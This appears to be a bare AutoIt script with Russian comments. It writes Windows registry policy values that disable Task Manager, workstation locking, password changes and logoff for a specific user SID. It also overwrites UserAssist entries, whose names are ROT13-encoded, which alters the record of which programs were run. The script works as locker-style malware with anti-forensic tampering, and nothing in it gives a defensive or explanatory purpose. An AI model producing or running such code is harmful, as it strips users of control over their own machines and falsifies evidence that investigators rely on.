Global $var1 = 0, $var2 = 0, $var3 = 0, $var4 = 0, $var5 = 0, $var6 = 0, $var7 = 0, $var8 = 0, $var9 = 0, $var10 = 0
r_egister()
Func r_egister()
$var1 = RegRead("HKEY_USERS64\S-1-5-21-1265459106-3028646723-2073955745-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr")
$var2 = RegRead("HKEY_USERS64\S-1-5-21-1265459106-3028646723-2073955745-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableLockWorkstation")
$var3 = RegRead("HKEY_USERS64\S-1-5-21-1265459106-3028646723-2073955745-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableChangePassword")
$var4 = RegRead("HKEY_USERS64\S-1-5-21-1265459106-3028646723-2073955745-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "undockwithoutlogon")
$var5 = RegRead("HKEY_USERS64\S-1-5-21-1265459106-3028646723-2073955745-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count", "{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\rkcybere.rkr")
$var6 = RegRead("HKEY_USERS64\S-1-5-21-1265459106-3028646723-2073955745-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count", "{6Q809377-6NS0-444O-8957-N3773S02200R}\FlfGenpre\FlfGenpre.rkr")
$var7 = RegRead("HKEY_USERS64\S-1-5-21-1265459106-3028646723-2073955745-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count", "P:\Hfref\BYRT5\Qrfxgbc\rpyvcfr\rqvgpgnyqy.rkr")
$var8 = RegRead("HKEY_USERS64\S-1-5-21-1265459106-3028646723-2073955745-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count", "HRZR_PGYFRFFVBA")
;$var9 = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "undockwithoutlogon")
;$var10 = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "undockwithoutlogon")
Select
Case $var1 = 0
RegWrite("HKEY_USERS64\S-1-5-21-1265459106-3028646723-2073955745-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD","1" ) ; Записывает в реестр единственное значение "1"
EndSelect
Select
Case $var2 = 0
RegWrite("HKEY_USERS64\S-1-5-21-1265459106-3028646723-2073955745-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableLockWorkstation", "REG_DWORD", "1") ; Записывает в реестр единственное значение "1"
EndSelect
Select
Case $var3 = 0
RegWrite("HKEY_USERS64\S-1-5-21-1265459106-3028646723-2073955745-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableChangePassword", "REG_DWORD", "1") ; Записывает в реестр единственное значение "1"
EndSelect
Select
Case $var4 = 0
RegWrite("HKEY_LOCAL_MACHINE64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "NoLogoff", "REG_DWORD", "1") ; Записывает в реестр единственное значение "1"
EndSelect
Select
Case $var5 = "13 00 00 00 00 00 00 00 6a 00 00 00 f2 4f 09 00 0c 81 a0 3e 7a 0c 8a 3e 5b 72 bb 3e a4 24 d5 3e cc 1e 15 3e d0 fe a9 3d 1a 1e d3 3e ad 2b 5e 3e 00 00 80 bf 00 00 80 bf 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "
RegWrite("HKEY_USERS64\S-1-5-21-1265459106-3028646723-2073955745-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count", "{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\rkcybere.rkr", "REG_BINARY", _
"13 00 00 00 00 00 00 00 6c 00 00 00 80 5c 09 00 0c 81 a0 3e 7a 0c 8a 3e 5b 72 bb 3e a4 24 d5 3e cc 1e 15 3e d0 fe a9 3d 1a 1e d3 3e ad 2b 5e 3e 00 00 80 bf 00 00 80 bf 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ") ; Записывает в реестр единственное значение "..."
EndSelect
Select
Case $var6 = "13 00 00 00 00 00 00 00 09 00 00 00 85 8c 02 00 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 "
RegWrite("HKEY_USERS64\S-1-5-21-1265459106-3028646723-2073955745-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count", "{6Q809377-6NS0-444O-8957-N3773S02200R}\FlfGenpre\FlfGenpre.rkr", "REG_BINARY", _
"13 00 00 00 00 00 00 00 0a 00 00 00 af 94 02 00 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 "); Записывает в реестр единственное значение "..."
EndSelect
Select
Case $var7 = "13 00 00 00 03 00 00 00 04 00 00 00 55 37 00 00 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf ff ff ff ff 90 d4 9c 8f 66 23 cf 01 00 00 00 00 "
RegWrite("HKEY_USERS64\S-1-5-21-1265459106-3028646723-2073955745-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count", "P:\Hfref\BYRT5\Qrfxgbc\rpyvcfr\rqvgpgnyqy.rkr", "REG_BINARY", _
"13 00 00 00 04 00 00 00 05 00 00 00 40 49 00 00 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf ff ff ff ff 50 9e 71 bd 66 23 cf 01 00 00 00 00 "); Записывает в реестр единственное значение "..."
EndSelect
EndFunc